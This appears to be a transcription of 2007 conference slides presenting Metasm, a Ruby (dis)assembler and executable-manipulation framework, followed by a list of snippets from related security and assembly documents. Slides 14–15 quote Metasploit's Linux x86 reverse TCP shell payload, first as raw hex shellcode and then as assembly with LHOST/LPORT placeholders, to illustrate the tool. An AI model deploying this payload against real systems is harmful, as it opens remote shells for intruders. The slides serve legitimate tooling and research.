Metasm. a ruby (dis)assembler. Yoann Guillot. 20 october 2007
|
|
|
- Harry Johns
- 6 years ago
- Views:
Transcription
1 Metasm a ruby (dis)assembler Yoann Guillot 20 october 2007
2 Metasm Presentation I am Yoann Guillot I work for Sogeti/ESEC in the security R&D lab Metasm HACK.LU / 23
3 Plan Metasm 1 Metasm 2 Metasm HACK.LU / 23
4 Introduction Metasm Metasm is a full-ruby standalone framework To manipulate machine code (static or dynamic) Multi-CPU (Ia32/MIPS for now) Multi-OS (Windows/Linux) distributed under the open-source LGPL license still under heavy developpement Metasm HACK.LU / 23
5 Metasm Metasm HACK.LU / 23
6 Metasm EncodedData represents a relocatable binary string binary data arbitrary relocations exports virtual size used to dissociate assembly from linking Metasm HACK.LU / 23
7 Metasm mov eax, dword ptr [toto] Metasm HACK.LU / 23
8 Metasm simple yet powerful backtracking engine emulates standard CPU instructions follows precisely code flow currently unfinished trace data access handle subfunctions handle external API calls minimal arch-specific developpement Metasm HACK.LU / 23
9 Metasm Handling executable files reading from a file directly in memory writing from scratch patch an existing exe currently supported formats: MZ / PE / COFF, ELF / a.out Metasm HACK.LU / 23
10 C Compilation Metasm Metasm includes a complete C parser features header filtering basic compiler for Ia32 Metasm HACK.LU / 23
11 Metasm String-like process memory abstraction transparent read/write Ruby objects wrap the host OS debug API Metasm HACK.LU / 23
12 When is it useful Metasm whenever you want to manipulate machine code or executable files it s easy to hook/rewrite/customize any internal method Metasm HACK.LU / 23
13 - before Metasm is also written in Ruby it had very bad machine code support hexadecimal static shellcodes hacks to patch the shellcodes with user-specified values more hacks to link stages Metasm HACK.LU / 23
14 - before Metasm [metasploit3/.../reverse tcp.rb] Payload => { Offsets => { LHOST => [ 0x1a, ADDR ], LPORT => [ 0x20, n ], }, Payload => "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" + "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" + "\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" + "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xb0\x0b\xcd\x80" } Metasm HACK.LU / 23
15 - now [metasploit3/.../reverse tcp2.rb] Metasm Payload => { Offsets => { LHOST => [ 0, ADDR ], LPORT => [ 0, n ], }, => <<EOS xor ebx, ebx 31db [...] pop edx 5a push LHOST 687f push.i16 LPORT 6668bfbf [...] push //sh push /bin [...] mov al, 0bh b00b int 80h cd80 EOS } Metasm HACK.LU / 23
16 - now Metasm Metasm is now included in Metasploit shellcodes can be in source from standard Metasm relocation handling may be used for shellcode patching/linking??? Profit! Metasm HACK.LU / 23
17 Metasm metasm-shell Plan 1 Metasm 2 metasm-shell Metasm HACK.LU / 23
18 Metasm metasm-shell metasm-shell metasm-shell adds metasm methods to standard Ruby Strings offers an interactive assembler shell Metasm HACK.LU / 23
19 Metasm metasm-shell reading a MIPS ELF Metasm HACK.LU / 23
20 Metasm metasm-shell reading a MIPS ELF compiling a simple PE [samples/testpe.rb] Metasm HACK.LU / 23
21 Metasm metasm-shell reading a MIPS ELF compiling a simple PE [samples/testpe.rb] patching a PE [samples/pe-hook.rb] Metasm HACK.LU / 23
22 Metasm metasm-shell Windows process hooking simple IAT hook [samples/win32hooker.rb] Metasm HACK.LU / 23
23 Metasm metasm-shell Windows process hooking full-library hook [samples/win32hooker-advanced.rb] redirect all exported function to a custom hook Metasm HACK.LU / 23
24 Metasm metasm-shell Linux debugging ptrace wrapper [samples/rubstop.rb] singlestep, stepover, etc memory access PaX compatible Metasm HACK.LU / 23
25 Metasm metasm-shell Linux debugging ptrace wrapper [samples/rubstop.rb] singlestep, stepover, etc memory access PaX compatible UI [samples/lindebug.rb] console-mode only (for now) Metasm HACK.LU / 23
26 Metasm metasm-shell Conclusion Thanks for listening Questions? Metasm HACK.LU / 23
Shell Code For Beginners
Shell Code For Beginners Beenu Arora Site: www.beenuarora.com Email: beenudel1986@gmail.com ################################################################ #.. # # _/ \ _ \ _/ # # / \ \\ \ / // \/ /_\
CNIT 127: Exploit Development. Ch 3: Shellcode. Updated
CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing
The Geometry of Innocent Flesh on the Bone
The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop
Inside VMProtect. Introduction. Internal. Analysis. VM Logic. Inside VMProtect. Conclusion. Samuel Chevet. 16 January 2015.
16 January 2015 Agenda Describe what VMProtect is Introduce code virtualization in software protection Methods for circumvention VM logic Warning Some assumptions are made in this presentation Only few
Static Analysis I PAOLO PALUMBO, F-SECURE CORPORATION
Static Analysis I PAOLO PALUMBO, F-SECURE CORPORATION Representing Data Binary numbers 1 0 1 1 NIBBLE 0xB 1 0 1 1 1 1 0 1 0xBD 1 0 1 1 1 1 0 1 0 0 1 1 1 0 0 1 BYTE WORD 0xBD 0x39 Endianness c9 33 41 03
Runtime Process Insemination
Runtime Process Insemination Shawn lattera Webb SoldierX https://www.soldierx.com/ Who Am I? Just another blogger Professional Security Analyst Twelve-year C89 programmer Member of SoldierX, BinRev, and
This is an example C code used to try out our codes, there several ways to write this but they works out all the same.
...._ _... _.;_/ [_) (_]\_ [ )(_](_. \.net._ "LINUX SHELLCODING REFERENCE" Author: Nexus Email: nexus.hack@gmail.com Website: http://www.playhack.net Introduction ------------- One of the most important
Program Exploitation Intro
Program Exploitation Intro x86 Assembly 04//2018 Security 1 Univeristà Ca Foscari, Venezia What is Program Exploitation "Making a program do something unexpected and not planned" The right bugs can be
Comparison Of File Infection On The Windows And Linux lclee_vx / F-13 Labs, lychan25/f-13 Labs
Comparison Of File Infection On The Windows And Linux lclee_vx / F-13 Labs, lychan25/f-13 Labs [www.f13-labs.net] Overview Introduction What is Win32 and ELF32? The PE File Format and ELF File Format Win32
T Reverse Engineering Malware: Static Analysis I
T-110.6220 Reverse Engineering Malware: Static Analysis I Antti Tikkanen, F-Secure Corporation Protecting the irreplaceable f-secure.com Representing Data 2 Binary Numbers 1 0 1 1 Nibble B 1 0 1 1 1 1
C03c: Linkers and Loaders
CISC 3320 MW3 C03c: Linkers and Loaders Hui Chen Department of Computer & Information Science CUNY Brooklyn College 2/4/2019 CUNY Brooklyn College: CISC 3320 OS 1 Outline Linkers and linking Loaders and
CSE2421 Systems1 Introduction to Low-Level Programming and Computer Organization
Spring 2013 CSE2421 Systems1 Introduction to Low-Level Programming and Computer Organization Kitty Reeves TWRF 8:00-8:55am 1 Compiler Drivers = GCC When you invoke GCC, it normally does preprocessing,
Sandwiches for everyone
Inf2C :: Computer Systems Today s menu ( And finally, monsieur, a wafer-thin mint ) Notes on security Or, why safety is an illusion, why ignorance is bliss, and why knowledge is power Stack overflows Or,
Building Payloads Tutorial
Building Payloads Tutorial Last updated 06/23/2014-4.9 With Metasploit Pro, you can build payloads with the Payload Generator. The Payload Generator provides a guided interface that you can use to quickly
Università Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
IA-32 Architecture. CS 4440/7440 Malware Analysis and Defense
IA-32 Architecture CS 4440/7440 Malware Analysis and Defense Intel x86 Architecture } Security professionals constantly analyze assembly language code } Many exploits are written in assembly } Source code
CS 31: Intro to Systems ISAs and Assembly. Martin Gagné Swarthmore College February 7, 2017
CS 31: Intro to Systems ISAs and Assembly Martin Gagné Swarthmore College February 7, 2017 ANNOUNCEMENT All labs will meet in SCI 252 (the robot lab) tomorrow. Overview How to directly interact with hardware
HITB Amsterdam
Closer to metal: Reverse engineering the Broadcom NetExtreme s firmware Guillaume Delugré Sogeti / ESEC R&D guillaume(at)security-labs.org HITB 2011 - Amsterdam Purpose of this presentation G. Delugré
Practical Malware Analysis
Practical Malware Analysis Ch 4: A Crash Course in x86 Disassembly Revised 1-16-7 Basic Techniques Basic static analysis Looks at malware from the outside Basic dynamic analysis Only shows you how the
CVE EXPLOIT USING 108 BYTES AND DOWNLOADING A FILE WITH YOUR UNLIMITED CODE BY VALTHEK
CVE-2017-11882 EXPLOIT USING 108 BYTES AND DOWNLOADING A FILE WITH YOUR UNLIMITED CODE BY VALTHEK First words of thank to Embedy Company to discover the initial exploit and POC of 44 bytes máximum, Ridter
CSC 405 Computer Security Shellcode
CSC 405 Computer Security Shellcode Alexandros Kapravelos akaprav@ncsu.edu Attack plan Attack code Vulnerable code xor ebx, ebx xor eax, eax mov ebx,edi mov eax,edx sub eax,0x388 Vulnerable code xor ebx,
mith College Computer Science CSC231 - Assembly Week #4 Dominique Thiébaut
mith College Computer Science CSC231 - Assembly Week #4 Dominique Thiébaut dthiebaut@smith.edu Homework Solutions Outline Review Hexdump Pentium Data Registers 32-bit, 16-bit and 8-bit quantities (registers
Overview of Compiler. A. Introduction
CMPSC 470 Lecture 01 Topics: Overview of compiler Compiling process Structure of compiler Programming language basics Overview of Compiler A. Introduction What is compiler? What is interpreter? A very
Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.
Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit
Is stack overflow still a problem?
Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains
Link 2. Object Files
Link 2. Object Files Young W. Lim 2017-09-23 Sat Young W. Lim Link 2. Object Files 2017-09-23 Sat 1 / 40 Outline 1 Linking - 2. Object Files Based on Oject Files ELF Sections Example Program Source Codes
Malware
reloaded Malware Research Team @ @xabiugarte Motivation Design principles / architecture Features Use cases Future work Dynamic Binary Instrumentation Techniques to trace the execution of a binary (or
From Over ow to Shell
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail:
W4118: PC Hardware and x86. Junfeng Yang
W4118: PC Hardware and x86 Junfeng Yang A PC How to make it do something useful? 2 Outline PC organization x86 instruction set gcc calling conventions PC emulation 3 PC board 4 PC organization One or more
ADDRESSING MODES. Operands specify the data to be used by an instruction
ADDRESSING MODES Operands specify the data to be used by an instruction An addressing mode refers to the way in which the data is specified by an operand 1. An operand is said to be direct when it specifies
Linux Boot Process. Nassim Eddequiouaq LSE Summer Week 2015
Linux Boot Process Nassim Eddequiouaq LSE Summer Week 2015 Why does boot matter? No boot No boot! OS uses evolving hardware features Faster and more secure please What does Linux need? Hardware initialization
Metasploit Unleashed. Class 1: Metasploit Fundamentals. Georgia Weidman Director of Cyberwarface, Reverse Space
Metasploit Unleashed Class 1: Metasploit Fundamentals Georgia Weidman Director of Cyberwarface, Reverse Space Acknowledgments Metasploit Team Offensive Security/Metasploit Unleashed Hackers for Charity
ROPInjector: Using Return- Oriented Programming for Polymorphism and AV Evasion
University of Piraeus Department of Digital Systems ROPInjector: Using Return- Oriented Programming for Polymorphism and AV Evasion G. Poulios, C. Ntantogian, C. Xenakis {gpoulios, dadoyan, xenakis}@unipi.gr
Systems Programming. Fatih Kesgin &Yusuf Yaslan Istanbul Technical University Computer Engineering Department 18/10/2005
Systems Programming Fatih Kesgin &Yusuf Yaslan Istanbul Technical University Computer Engineering Department 18/10/2005 Outline How to assemble and link nasm ld gcc Debugging Using gdb; breakpoints,registers,
Compiler Drivers = GCC
Compiler Drivers = GCC When you invoke GCC, it normally does preprocessing, compilation, assembly and linking, as needed, on behalf of the user accepts options and file names as operands % gcc O1 -g -o
The Darker Sides of Assembly
The Darker Sides of Assembly We've seen it. Alex Radocea, Andrew Zonenberg Moments in History Thompson's Compiler Backdoor http://cm.bell-labs.com/who/ken/trust.html I am a programmer. On my 1040 form,
Biography. Background
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com
Machine Language, Assemblers and Linkers"
Machine Language, Assemblers and Linkers 1 Goals for this Lecture Help you to learn about: IA-32 machine language The assembly and linking processes 2 1 Why Learn Machine Language Last stop on the language
CS Bootcamp x86-64 Autumn 2015
The x86-64 instruction set architecture (ISA) is used by most laptop and desktop processors. We will be embedding assembly into some of our C++ code to explore programming in assembly language. Depending
The IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta
1 The IA-32 Stack and Function Calls CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta 2 Important Registers used with the Stack EIP: ESP: EBP: 3 Important Registers used with the Stack EIP:
Cross Compiling. Real Time Operating Systems and Middleware. Luca Abeni
Cross Compiling Real Time Operating Systems and Middleware Luca Abeni luca.abeni@unitn.it The Kernel Kernel OS component interacting with hardware Runs in privileged mode (Kernel Space KS) User Level Kernel
Shellcode. Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona. Tel Fax
Shellcode Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout C Arrays Buffer
Autodesk AutoCAD DWG-AC1021 Heap Corruption
security research Autodesk AutoCAD DWG-AC1021 Heap Corruption Mar 2013 AutoCAD is a software for computer-aided design (CAD) and technical drawing in 2D/3D, being one of the worlds leading CAD design tools.
Computer Architecture and Assembly Language. Practical Session 5
Computer Architecture and Assembly Language Practical Session 5 Addressing Mode - "memory address calculation mode" An addressing mode specifies how to calculate the effective memory address of an operand.
T Jarkko Turkulainen, F-Secure Corporation
T-110.6220 2010 Emulators and disassemblers Jarkko Turkulainen, F-Secure Corporation Agenda Disassemblers What is disassembly? What makes up an instruction? How disassemblers work Use of disassembly In
T Using debuggers to analyze malware. Antti Tikkanen, F-Secure Corporation
T-110.6220 Using debuggers to analyze malware Antti Tikkanen, F-Secure Corporation Agenda Debugger basics Introduction Scenarios and tools How do debuggers work? Debug API The debugging loop Underlying
mith College Computer Science CSC231 - Assembly Week #3 Dominique Thiébaut
mith College Computer Science CSC231 - Assembly Week #3 Dominique Thiébaut dthiebaut@smith.edu memory mov add registers hexdump listings number systems Let's Review Last Week's Material section.data
INFORMATION SECURITY - PRACTICAL ASSESSMENT - BASICS IN BUFFER EXPLOITATION
INFORMATION SECURITY - PRACTICAL ASSESSMENT - BASICS IN BUFFER EXPLOITATION GRENOBLE INP ENSIMAG http://www.ensimag.fr COMPUTER SCIENCE 3RD YEAR IF-MMIS - 1ST SEMESTER, 2011 Lecturers: Fabien Duchene -
What is the Run-Time System?
DVMEx IDE Run-Time System (DV RTS) 1/27 What is the Run-Time System? RTS is the component aimed at executing IEC 61131-3 control and measurement programs on Intel and ARM processors, for Linux, WinCE and
SOEN228, Winter Revision 1.2 Date: October 25,
SOEN228, Winter 2003 Revision 1.2 Date: October 25, 2003 1 Contents Flags Mnemonics Basic I/O Exercises Overview of sample programs 2 Flag Register The flag register stores the condition flags that retain
Buffer Overflow Vulnerability
Buffer Overflow Vulnerability 1 Buffer Overflow Vulnerability Copyright c 2006 2014 Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from the US National
CSC 2400: Computer Systems. Using the Stack for Function Calls
CSC 24: Computer Systems Using the Stack for Function Calls Lecture Goals Challenges of supporting functions! Providing information for the called function Function arguments and local variables! Allowing
Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it
Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier
EECE.3170: Microprocessor Systems Design I Summer 2017 Homework 4 Solution
1. (40 points) Write the following subroutine in x86 assembly: Recall that: int f(int v1, int v2, int v3) { int x = v1 + v2; urn (x + v3) * (x v3); Subroutine arguments are passed on the stack, and can
iapx Systems Electronic Computers M
iapx Systems Electronic Computers M 1 iapx History We analyze 32 bit systems: generalization to 64 bits is straigtforward Segment Registers (16 bits) Code Segment Stack Segment Data Segment Extra Ssegment
CSC 591 Systems Attacks and Defenses Return-into-libc & ROP
CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD
FLARE-On 4: Challenge 3 Solution greek_to_me.exe
FLARE-On 4: Challenge 3 Solution greek_to_me.exe Challenge Author: Matt Williams (@0xmwilliams) greek_to_me.exe is a Windows x86 executable whose strings reveal what is likely the desired state of the
Lecture 2 Assembly Language
Lecture 2 Assembly Language Computer and Network Security 9th of October 2017 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 2, Assembly Language 1/37 Recap: Explorations Tools assembly
Hack in the Box Trends and Tools. H D Moore
Hack in the Box 2003 Advanced Exploit Development Trends and Tools H D Moore 1 Who Who am I? Co-founder of Digital Defense Security researcher (5+ years) Projects DigitalOffense.net Metasploit.com 2 What
Architecture-level Security Vulnerabilities
Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:
Reversing Basics A Practical Approach
Reversing Basics A Practical Approach Author: Amit Malik (DouBle_Zer0) E-Mail: m.amit30@gmail.com Note: Keep Out of Reach of Children/Danger-Software Poison. Download EXE/Crackme: https://sites.google.com/site/hacking1now/crackmes
CSC 2400: Computer Systems. Towards the Hardware: Machine-Level Representation of Programs
CSC 2400: Computer Systems Towards the Hardware: Machine-Level Representation of Programs Towards the Hardware High-level language (Java) High-level language (C) assembly language machine language (IA-32)
CSC 405 Computer Security Reverse Engineering Part 1
CSC 405 Computer Security Reverse Engineering Part 1 Alexandros Kapravelos akaprav@ncsu.edu Introduction Reverse engineering process of analyzing a system understand its structure and functionality used
Objectives. Chapter 2: Operating-System Structures. 2.1 Operating System Services
Objectives Chapter 2: Operating-System Structures To describe the services an operating system provides to users, processes, and other systems To discuss the various ways of structuring an operating system
Interfacing Compiler and Hardware. Computer Systems Architecture. Processor Types And Instruction Sets. What Instructions Should A Processor Offer?
Interfacing Compiler and Hardware Computer Systems Architecture FORTRAN 90 program C++ program Processor Types And Sets FORTRAN 90 Compiler C++ Compiler set level Hardware 1 2 What s Should A Processor
mith College Computer Science CSC231-Assembly Fall 2017 Week #2 Dominique Thiébaut
mith College Computer Science CSC231-Assembly Fall 2017 Week #2 Dominique Thiébaut dthiebaut@smith.edu Outline Labs: emacs, assembly Assembly + Linking Process Object files DB directive: Everything is
MACHINE-LEVEL PROGRAMMING I: BASICS COMPUTER ARCHITECTURE AND ORGANIZATION
MACHINE-LEVEL PROGRAMMING I: BASICS COMPUTER ARCHITECTURE AND ORGANIZATION Today: Machine Programming I: Basics History of Intel processors and architectures C, assembly, machine code Assembly Basics:
Fixing/Making Holes in Binaries
Fixing/Making Holes in Binaries The Easy, The Hard, The Time Consuming Shaun Clowes Ð shaun@securereality.com.au What are we doing? Changing the behaviour of programs Directly modifying the program in
X86 Addressing Modes Chapter 3" Review: Instructions to Recognize"
X86 Addressing Modes Chapter 3" Review: Instructions to Recognize" 1 Arithmetic Instructions (1)! Two Operand Instructions" ADD Dest, Src Dest = Dest + Src SUB Dest, Src Dest = Dest - Src MUL Dest, Src
CMSC Lecture 03. UMBC, CMSC313, Richard Chang
CMSC Lecture 03 Moore s Law Evolution of the Pentium Chip IA-32 Basic Execution Environment IA-32 General Purpose Registers Hello World in Linux Assembly Language Addressing Modes UMBC, CMSC313, Richard
Dissecting APT Sample Step by Step. Kārlis Podiņš, CERT.LV
Dissecting APT Sample Step by Step Kārlis Podiņš, CERT.LV 1 New Email has Arrived Please see the document attached $ file readme.docx readme.docx: Microsoft OOXML Metadata $ exiftool readme.docx Total
CS 31: Intro to Systems ISAs and Assembly. Kevin Webb Swarthmore College September 25, 2018
CS 31: Intro to Systems ISAs and Assembly Kevin Webb Swarthmore College September 25, 2018 Overview How to directly interact with hardware Instruction set architecture (ISA) Interface between programmer
CS 31: Intro to Systems ISAs and Assembly. Kevin Webb Swarthmore College February 9, 2016
CS 31: Intro to Systems ISAs and Assembly Kevin Webb Swarthmore College February 9, 2016 Reading Quiz Overview How to directly interact with hardware Instruction set architecture (ISA) Interface between
Link 2. Object Files
Link 2. Object Files Young W. Lim 2017-09-20 Wed Young W. Lim Link 2. Object Files 2017-09-20 Wed 1 / 33 Outline 1 Linking - 2. Object Files Based on Oject Files ELF Sections Example Program Source Codes
Portable Executable format, TitaniumCore report and packers. Katja Pericin
Portable Executable format, TitaniumCore report and packers Katja Pericin Portable Executable format 3/21/2018 2 Introduction file? operating system abstraction for a data container segment(s) of physical
Making Dynamic Instrumentation Great Again
Making Dynamic Instrumentation Great Again Malware Research Team @ @xabiugarte [advertising space ] Deep Packer Inspector https://packerinspector.github.io https://packerinspector.com Many instrumentation
Function Call Convention
Function Call Convention Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout
Shellcode Analysis. Chapter 19
Shellcode Analysis Chapter 19 What is Shellcode Shellcode a payload of raw executable code, attackers use this code to obtain interactive shell access. A binary chunk of data Can be generally referred
CS412/CS413. Introduction to Compilers Tim Teitelbaum. Lecture 21: Generating Pentium Code 10 March 08
CS412/CS413 Introduction to Compilers Tim Teitelbaum Lecture 21: Generating Pentium Code 10 March 08 CS 412/413 Spring 2008 Introduction to Compilers 1 Simple Code Generation Three-address code makes it
LIEF: Library to Instrument Executable Formats
RMLL 2017 Romain Thomas - rthomas@quarkslab.com LIEF: Library to Instrument Executable Formats Table of Contents Introduction Project Overview Demo Conclusion About Romain Thomas (rthomas@quarkslab.com)
Islamic University Gaza Engineering Faculty Department of Computer Engineering ECOM 2125: Assembly Language LAB. Lab # 10. Advanced Procedures
Islamic University Gaza Engineering Faculty Department of Computer Engineering ECOM 2125: Assembly Language LAB Lab # 10 Advanced Procedures May, 2014 1 Assembly Language LAB Stack Parameters There are
Countering Code-Injection Attacks With Instruction-Set Randomization
Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D. Keromytis Columbia University Vassilis Prevelakis Drexel University 1 Overview of Technique Protect from code-injection
We can study computer architectures by starting with the basic building blocks. Adders, decoders, multiplexors, flip-flops, registers,...
COMPUTER ARCHITECTURE II: MICROPROCESSOR PROGRAMMING We can study computer architectures by starting with the basic building blocks Transistors and logic gates To build more complex circuits Adders, decoders,
Assembly Language Programming 64-bit environments
Assembly Language Programming 64-bit environments October 17, 2017 Some recent history Intel together with HP start to work on 64-bit processor using VLIW technology. Itanium processor is born with the
CS 550 Operating Systems Spring Process I
CS 550 Operating Systems Spring 2018 Process I 1 Process Informal definition: A process is a program in execution. Process is not the same as a program. Program is a passive entity stored in the disk Process
OpenBSD Remote Exploit
OpenBSD Remote Exploit Only two remote holes in the default install Alfredo A. Ortega June 30, 2007 Mbuf buffer overflow Buffer overflow Researching the OpenBSD 008: RELIABILITY FIX a new vulnerability
CSC 2400: Computer Systems. Using the Stack for Function Calls
CSC 24: Computer Systems Using the Stack for Function Calls Lecture Goals Challenges of supporting functions! Providing information for the called function Function arguments and local variables! Allowing
Islamic University Gaza Engineering Faculty Department of Computer Engineering ECOM 2125: Assembly Language LAB
Islamic University Gaza Engineering Faculty Department of Computer Engineering ECOM 2125: Assembly Language LAB Lab # 9 Integer Arithmetic and Bit Manipulation April, 2014 1 Assembly Language LAB Bitwise
System calls and assembler
System calls and assembler Michal Sojka sojkam1@fel.cvut.cz ČVUT, FEL License: CC-BY-SA 4.0 System calls (repetition from lectures) A way for normal applications to invoke operating system (OS) kernel's
Rootkits n Stuff
Rootkits n Stuff www.sigmil.org What a rootkit is(n t) IS Software intended to conceal running processes, files, etc from the OS A way to maintain control of a system after compromising it. ISN T A buffer
Reverse Engineering Microsoft Binaries
Reverse Engineering Microsoft Binaries Alexander Sotirov asotirov@determina.com Recon 2006 Overview In the next one hour, we will cover: Setting up a scalable reverse engineering environment getting binaries
Chapter 2: System Structures
Chapter 2: System Structures Chapter 2: System Structures 2.1 Operating-System Services 2.2 User and Operating-System Interface 2.3 System Calls 2.4 Types of System Calls 2.5 System Programs 2.6 Operating-System
Byte Ordering. Jinkyu Jeong Computer Systems Laboratory Sungkyunkwan University
Byte Ordering Jinkyu Jeong (jinkyu@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu SSE2030: Introduction to Computer Systems, Spring 2018, Jinkyu Jeong (jinkyu@skku.edu)
Islamic University Gaza Engineering Faculty Department of Computer Engineering ECOM 2125: Assembly Language LAB. Lab # 7. Procedures and the Stack
Islamic University Gaza Engineering Faculty Department of Computer Engineering ECOM 2125: Assembly Language LAB Lab # 7 Procedures and the Stack April, 2014 1 Assembly Language LAB Runtime Stack and Stack
MOSREF: Cryptography and Injectable Virtual Machines. Wes Brown Ephemeral Security
MOSREF: Cryptography and Injectable Virtual Machines Wes Brown Ephemeral Security Introduction Ephemeral Security We conduct research, development and engineering of very interesting solutions and products.
CSC 8400: Computer Systems. Using the Stack for Function Calls
CSC 84: Computer Systems Using the Stack for Function Calls Lecture Goals Challenges of supporting functions! Providing information for the called function Function arguments and local variables! Allowing
Teensy Tiny ELF Programs
Teensy Tiny ELF Programs inspired by Brian Raiter Roland Hieber Stratum 0 e. V. March 15, 2013 1 / 14 Hello World # include int main ( int argc, char ** argv ) { printf (" Hello World!\n"); return
Syscall Proxying. Simulating Remote Execution. Maximiliano Cáceres.
Syscall Proxying Maximiliano Cáceres maximiliano.caceres@corest.com Caesars Palace, Las Vegas, NV, USA July 31st, 2002 Agenda General Concepts Syscall Proxying A first implementation Optimizing for size
Lecture 08 Control-flow Hijacking Defenses
Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation
Lab 3: Defining Data and Symbolic Constants
COE 205 Lab Manual Lab 3: Defining Data and Symbolic Constants - page 25 Lab 3: Defining Data and Symbolic Constants Contents 3.1. MASM Data Types 3.2. Defining Integer Data 3.3. Watching Variables using